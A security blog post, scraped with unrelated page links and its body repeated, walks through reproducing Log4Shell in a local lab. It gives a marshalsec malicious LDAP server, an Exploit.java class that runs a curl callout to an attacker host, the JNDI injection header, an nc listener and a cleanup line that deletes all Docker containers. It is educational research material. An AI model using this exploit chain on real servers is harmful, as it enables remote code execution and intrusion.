![[The AI Show Episode 142]: ChatGPT’s New Image Generator, Studio Ghibli Craze and Backlash, Gemini 2.5, OpenAI Academy, 4o Updates, Vibe Marketing & xAI Acquires X](https://www.marketingaiinstitute.com/hubfs/ep%20142%20cover.png)
![[FREE EBOOKS] The Kubernetes Bible, The Ultimate Linux Shell Scripting Guide & Four More Best Selling Titles](https://www.javacodegeeks.com/wp-content/uploads/2012/12/jcg-logo.jpg){kind=logo}
![From drop-out to software architect with Jason Lengstorf [Podcast #167]](https://cdn.hashnode.com/res/hashnode/image/upload/v1743796461357/f3d19cd7-e6f5-4d7c-8bfc-eb974bc8da68.png?#)
.png?#)
.jpg?#)
 (1).webp?#)
_Christophe_Coat_Alamy.jpg?#)
![Rapidus in Talks With Apple as It Accelerates Toward 2nm Chip Production [Report]](https://www.iclarified.com/images/news/96937/96937/96937-640.jpg)
Reproducing Log4Shell Locally: A Controlled Exploitation Lab
The ability to reproduce vulnerabilities in a contained lab environment is a cornerstone of responsible security research. In this post, we build a minimalist setup to safely reproduce Log4Shell (CVE-2021-44228), demonstrating its impact and behavior. ⚠ Disclaimer This lab is for educational and research purposes only. Do not deploy this setup on public-facing infrastructure. 1. Lab Architecture ┌────────────┐ LDAP Callback ┌────────────┐ │ Vulnerable │ ←───────────────→ │ Attacker │ │ Server │ │ (LDAP + JShell) │ └────────────┘ └────────────┘ Components: Vulnerable Java app (Log4j ≤ 2.14.1) Malicious LDAP server using marshalsec Optional reverse shell or command callback 2. Setup Vulnerable Server Clone minimal vulnerable app: git clone https://github.com/christophetd/log4shell-vulnerable-app.git cd log4shell-vulnerable-app docker build -t vulnerable-log4j-app . docker run -p 8080:8080 vulnerable-log4j-app Test endpoint: curl http://localhost:8080 -H 'X-Api-Version: 1.0' 3. Set Up Malicious LDAP Server Install dependencies: git clone https://github.com/mbechler/marshalsec.git cd marshalsec mvn clean package -DskipTests Run malicious LDAP server: java -cp target/marshalsec-*.jar marshalsec.jndi.LDAPRefServer \ "http://:8000/#Exploit" Note: Host a malicious Java class (Exploit.class) via a simple HTTP server: python3 -m http.server 8000 4. Create Exploit Class Example Exploit.java: import java.io.IOException; public class Exploit { static { try { Runtime.getRuntime().exec("curl http://:9999/pwned"); } catch (IOException e) { e.printStackTrace(); } } } Compile and serve it: javac Exploit.java # place it in your HTTP server root 5. Trigger the Exploit Send payload to vulnerable server: curl http://localhost:8080 -H 'X-Api-Version: ${jndi:ldap://:1389/Exploit}' Monitor logs / listener: nc -lvnp 9999 # listener for callout 6. Observations Once triggered, the vulnerable server performs a JNDI lookup → loads the remote class → executes the payload. This confirms RCE and reflects the original threat in controlled conditions. 7. Cleanup Always destroy containers and shut down servers after testing: docker rm -f $(docker ps -aq) Final Notes Reproducing CVEs like Log4Shell helps deepen your understanding of exploit chains, from surface exposure to execution vectors. In future posts, we’ll enhance this lab with: Real-time reverse shells Detection via eBPF or syscalls Mitigation layering (WAF, egress control, JVM flags) Stay sharp. Know the vector. Control the surface.
The ability to reproduce vulnerabilities in a contained lab environment is a cornerstone of responsible security research.
In this post, we build a minimalist setup to safely reproduce Log4Shell (CVE-2021-44228), demonstrating its impact and behavior.
⚠ Disclaimer
This lab is for educational and research purposes only.
Do not deploy this setup on public-facing infrastructure.
1. Lab Architecture
┌────────────┐ LDAP Callback ┌────────────┐
│ Vulnerable │ ←───────────────→ │ Attacker │
│ Server │ │ (LDAP + JShell) │
└────────────┘ └────────────┘
Components:
- Vulnerable Java app (Log4j ≤ 2.14.1)
- Malicious LDAP server using marshalsec
- Optional reverse shell or command callback
2. Setup Vulnerable Server
Clone minimal vulnerable app:
git clone https://github.com/christophetd/log4shell-vulnerable-app.git
cd log4shell-vulnerable-app
docker build -t vulnerable-log4j-app .
docker run -p 8080:8080 vulnerable-log4j-app
Test endpoint:
curl http://localhost:8080 -H 'X-Api-Version: 1.0'
3. Set Up Malicious LDAP Server
Install dependencies:
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
Run malicious LDAP server:
java -cp target/marshalsec-*.jar marshalsec.jndi.LDAPRefServer \
"http://:8000/#Exploit"
Note: Host a malicious Java class (Exploit.class) via a simple HTTP server:
python3 -m http.server 8000
4. Create Exploit Class
Example Exploit.java:
import java.io.IOException;
public class Exploit {
static {
try {
Runtime.getRuntime().exec("curl http://:9999/pwned" );
} catch (IOException e) {
e.printStackTrace();
}
}
}
Compile and serve it:
javac Exploit.java
# place it in your HTTP server root
5. Trigger the Exploit
Send payload to vulnerable server:
curl http://localhost:8080 -H 'X-Api-Version: ${jndi:ldap://:1389/Exploit}'
Monitor logs / listener:
nc -lvnp 9999 # listener for callout
6. Observations
Once triggered, the vulnerable server performs a JNDI lookup → loads the remote class → executes the payload.
This confirms RCE and reflects the original threat in controlled conditions.
7. Cleanup
Always destroy containers and shut down servers after testing:
docker rm -f $(docker ps -aq)
Final Notes
Reproducing CVEs like Log4Shell helps deepen your understanding of exploit chains,
from surface exposure to execution vectors.
In future posts, we’ll enhance this lab with:
- Real-time reverse shells
- Detection via eBPF or syscalls
- Mitigation layering (WAF, egress control, JVM flags)
Stay sharp. Know the vector. Control the surface.
